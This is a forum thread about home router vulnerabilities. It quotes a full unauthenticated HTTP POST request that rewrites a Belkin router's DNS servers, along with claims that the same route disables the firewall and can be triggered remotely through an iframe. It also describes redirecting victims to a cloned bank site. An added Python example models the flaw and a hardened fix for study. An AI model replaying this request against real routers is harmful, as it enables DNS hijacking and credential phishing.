No. 1 reason to build your own router / reflash it with Linux

Impotence

May the source be with u!
Router Hacking Challenge | GNUCITIZEN

Just having a quick glance over that page has shattered any confidence I had left in embedded devices (more specifically home routers).

A lot of the methods described can be done remotely (with scripts embedded into HTML pages on compromised servers / malicious sites etc.) and would allow an attacker to change DNS settings (to a DNS server they control).

If you control someone's DNS results, then you control the content that their browser loads! (For example, send them the IP of another machine you control with a clone of their bank's website hosted on it when they request what-ever-there-bank-is.com).
 
What about power usage compared to embedded devices?

Haven't read through all of that, how does changing the DNS settings work if you're not logged in to the router?
 
Here's a good example

loftgaia said:
I now have managed to change router configuration options without even logging in. If I try to access the HTML pages of the router it will ask for a password, but not the script that handles the request itself. So we just need to replay the HTTP packets that actually perform the action.

*No* authentication or spoofing is required.

HTTP headers:

POST /cgi-bin/setup_dns.exe
Host: 192.168.2.1
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Referer: http://192.168.2.1/setup_dns.stm
Content-Type: application/x-www-form-urlencoded
Content-Length: 94

HTTP body:
page=setup_dns&logout=&dns1_1=1&dns1_2=1&dns1_3=1&dns1_4=1&dns2_1=2&dns2_2=2&dns2_3=2&dns2_4=2

After sending this the primary DNS server IP address will get changed to 1.1.1.1 and the secondary DNS server to 2.2.2.2. I have tried changing other options without a password and it worked all the time: disable firewall, reset to factory defaults, etc. The page will still ask for a password… too bad the script didn't. This can obviously be triggered remotely in at least a couple of ways.

belkin.html:
Belkin Wireless G router F5D7230-4 Hole

we can load in an iframe for example:
page1.html

Tomorrow I will be buying a new router.

You can build very low power x86 computers. THIS mobo, for example, only draws 14W (and with a second network card or ADSL modem, some RAM and a small SSD you have a low power router).

You can install Linux (OpenWrt etc.) on quite a few home routers... I have OpenWrt running on a WRT54G (v2.2) acting as a wireless client with NAT to share the connection to the machines on the wired side (the other benefit of not using the default firmware: you can't do this with the default WRT54G firmware).
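
The flaw loftgaia describes in the quote above (the .stm page asks for a password, the /cgi-bin/ script that applies the change does not) can be modelled in a few lines. This is an added example, not code from the thread or from any router firmware; the dispatcher, the Request class and the Origin check are assumptions chosen to show the vulnerable routing beside a hardened one.

```python
# Added illustration: toy model of a router web dispatcher (all names hypothetical).
from dataclasses import dataclass, field

ROUTER_ORIGIN = "http://192.168.2.1"   # LAN address taken from the quoted request

@dataclass
class Request:
    method: str
    path: str
    headers: dict = field(default_factory=dict)
    session_ok: bool = False           # True once the admin password was accepted

def apply_setting(req, config):
    # Stand-in for the CGI handlers (setup_dns.exe and similar).
    config["last_change"] = req.path
    return 200

def dispatch_vulnerable(req, config):
    # Flaw from the post: only the HTML pages (*.stm) are gated.
    if req.path.endswith(".stm"):
        return 200 if req.session_ok else 401
    if req.path.startswith("/cgi-bin/"):
        return apply_setting(req, config)      # no session check at all
    return 404

def dispatch_hardened(req, config):
    # One gate in front of every route, so a new handler cannot skip it.
    if not req.session_ok:
        return 401
    if req.path.startswith("/cgi-bin/"):
        # State changes must be POSTs that come from the router's own pages;
        # this rejects cross-site form or iframe submissions riding a live session.
        if req.method != "POST":
            return 405
        if req.headers.get("Origin") != ROUTER_ORIGIN:
            return 403
        return apply_setting(req, config)
    return 200 if req.path.endswith(".stm") else 404

def demo():
    # Constructed requests modelled on the one quoted above.
    path = "/cgi-bin/setup_dns.exe"
    cases = {
        "anon": Request("POST", path, {"Origin": "http://other.example"}),
        "xsite": Request("POST", path, {"Origin": "http://other.example"}, session_ok=True),
        "local": Request("POST", path, {"Origin": ROUTER_ORIGIN}, session_ok=True),
    }
    return {name: (dispatch_vulnerable(r, {}), dispatch_hardened(r, {}))
            for name, r in cases.items()}

if __name__ == "__main__":
    print(demo())
```

Each tuple is (vulnerable status, hardened status): the vulnerable dispatcher accepts all three requests, while the hardened one only accepts the logged-in request that originates from the router's own pages.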
 